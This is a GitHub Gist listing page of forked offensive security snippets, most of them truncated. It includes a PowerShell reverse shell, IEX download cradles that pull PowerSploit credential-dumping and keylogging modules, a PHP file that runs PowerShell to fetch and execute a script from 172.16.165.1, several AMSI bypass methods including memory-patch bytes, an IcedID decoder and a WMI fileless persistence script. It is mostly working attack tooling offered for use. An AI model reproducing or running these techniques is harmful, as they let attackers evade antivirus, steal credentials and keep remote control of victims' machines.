
@mmyyhack
mmyyhack / DynWin32-ReverseShell.ps1
Created April 13, 2023 18:33 — forked from Dviros/DynWin32-ReverseShell.ps1
PowerShell reverse shell that uses dynamically resolved Win32 API functions
<#
DynWin32-ReverseShell.ps1 is a reverse shell based on dynamically looked up Win32 API calls.
The script uses reflection to obtain access to GetModuleHandle, GetProcAddress and CreateProcess.
Afterwards it uses GetModuleHandle and GetProcAddress to resolve the required WSA functions
from ws2_32.dll.
This script should be used for educational purposes only (and maybe while playing CTF :D).
It was only tested on Windows 10 (x64) and is probably not stable or portable. Its only
purpose is to demonstrate the usage of reflective lookups of Win32 API calls. See it as
@mmyyhack
mmyyhack / In-memory PS injection.txt
Created April 9, 2023 22:52 — forked from chr0n1k/In-memory PS injection.txt
Some in-memory Powershell injection scripts
#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/Get-System.ps1');
#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/collection/Invoke-Inveigh.ps1')
#"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Out-Minidump.ps1')
#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-VaultCredential.ps1'); Get-VaultCredential
#IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-Keystrokes.ps1')
@mmyyhack
mmyyhack / PowershellAes.ps1
Created December 19, 2022 22:50 — forked from ctigeek/PowershellAes.ps1
AES encryption using PowerShell.
function Create-AesManagedObject($key, $IV) {
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
if ($IV) {
if ($IV.getType().Name -eq "String") {
$aesManaged.IV = [System.Convert]::FromBase64String($IV)
}
@mmyyhack
mmyyhack / decode.vbs
Last active December 18, 2022 23:14 — forked from Plazmaz/decode.vbs
A tool for decoding IcedID arrays
' Usage: cscript decode.vbs <array>
' Example:
' cscript decode.vbs "Array(g6,u7,s8,d4,z3,u7,b6,l5,j4,e9,k7,z1,k7)"
' returns qMUuDMFaZ.txt
conST r2=27
CONsT rr2=38
coNSt C5=42
cOnST D4=130
ConST t=132
coNst g2=146
@mmyyhack
mmyyhack / alpha.php
Created December 14, 2022 01:51 — forked from kamakazix/alpha.php
AMSI Bypass
<?php
function yolo() {
$payload = "powershell -nop -exec bypass -c IEX(New-Object Net.WebClient).DownloadString('http://172.16.165.1/beta.ps1')";
$execution_command = "shell_exec";
$query = $execution_command("$payload");
echo $query;
}
yolo();
die();
?>
@mmyyhack
mmyyhack / amsi-bypass.md
Created December 14, 2022 01:37 — forked from D3Ext/amsi-bypass.md
All methods to bypass AMSI (2022)

AMSI Bypass

To perform all these techniques you can simply try them by typing "Invoke-Mimikatz" into your PowerShell terminal; you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if AMSI is off or you avoid it, it will just say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed AMSI.

However, some methods may be detected by the AV, but most of them actually work without problem.

Powershell downgrade

The first and worst way to bypass AMSI is downgrading the PowerShell version to 2.0.

@mmyyhack
mmyyhack / my-dotnet-am-bypass.cs
Created December 12, 2022 21:37 — forked from FatRodzianko/my-dotnet-am-bypass.cs
AMSI bypass that modifies the bytes of the patch and then changes them in a for loop. ".\csc.exe -target:library -out:C:\Exclusions\my-dotnet-am-bypass.dll C:\Exclusions\my-dotnet-am-bypass.cs" "Add-Type -Path C:\Exclusions\my-dotnet-am-bypass.dll" "[Amsi]::Bypass()"
using System;
using System.Runtime.InteropServices;
public class Amsi
{
static byte[] patch = new byte[] { 0xBA, 0x59, 0x02, 0x09, 0x82, 0xC5 };
public static void Bypass()
@mmyyhack
mmyyhack / my-am-bypass.ps1
Created December 12, 2022 18:51 — forked from FatRodzianko/my-am-bypass.ps1
Small modification to RastaMouse's AmsiScanBuffer bypass to use bytes. Uses different opcode bytes.
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
@mmyyhack
mmyyhack / Invoke-Bypass.ps1
Created December 11, 2022 22:48 — forked from r00t-3xp10it/Invoke-Bypass.ps1
Disable AMS1 string scanning within the current process.
<#
.SYNOPSIS
Disable AMS1 within current process.
Author: @r00t-3xp10it
Tested Under: Windows 10 (19042) x64 bits
Required Dependencies: Assembly {native}
Optional Dependencies: IWR {native}
PS cmdlet Dev version: v1.1.4
@mmyyhack
mmyyhack / WMI-Persistence.ps1
Created December 9, 2022 22:31 — forked from infosecn1nja/WMI-Persistence.ps1
Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
# Fileless WMI Persistence (PSEDWMIEvent_SU - SystemUptime)
# https://wikileaks.org/ciav7p1/cms/page_14587908.html
<#
.SYNOPSIS
This script creates a persisted WMI event that executes a command upon trigger of the system's uptime being between a given range in seconds. The event will trigger only once.
#>
$EventFilterName = "Fileless WMI Persistence SystemUptime"